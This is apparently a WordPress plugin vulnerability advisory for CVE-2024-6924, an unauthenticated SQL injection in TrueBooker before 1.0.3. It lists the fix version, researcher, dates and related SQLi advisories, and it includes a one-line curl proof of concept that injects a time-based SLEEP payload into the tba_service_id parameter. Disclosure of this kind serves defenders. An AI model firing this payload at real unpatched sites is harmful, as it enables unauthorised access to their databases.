TrueBooker < 1.0.3 – Multiple Unauthenticated SQLi | CVE 2024-6924 | Plugin Vulnerabilities

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.

Proof of Concept

curl -iX POST "https://example.com/wp-content/plugins/truebooker-appointment-booking/main/truebooker-service-price.php" --data "tba_service_id=(SLEEP(5))"

Affects Plugins

truebooker-appointment-booking

Fixed in 1.0.3

References

CVE

URL

https://projectblack.io/blog/cve-hunting-at-scale/

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Project Black

Submitter

Project Black

Submitter website

https://projectblack.io/penetration-testing/

Submitter twitter

Verified

Yes

WPVDB ID

39e79801-6ec7-4579-bc6b-fd7e899733a8

Timeline

Publicly Published

2024-08-17 (about 1 year ago)

Added

2024-08-10 (about 1 year ago)

Last Updated

2024-10-28 (about 1 year ago)

Other

Published

Title

Published

2023-09-26

Title

Welcart e-Commerce < 2.8.22 - Editor+ SQL Injection

Published

2025-01-03

Title

Multiple Shipping And Billing Address For Woocommerce < 1.3 - Unauthenticated SQL Injection

Published

2023-03-20

Title

Groundhogg Contacts < 2.7.9.4 - Admin+ SQLi

Published

2025-10-14

Title

onOffice for WP-Websites <= 5.7 - Authenticated (Editor+) SQL Injection

Published

2022-10-03

Title

Blog2Social < 6.9.10 - Subscriber+ SQLi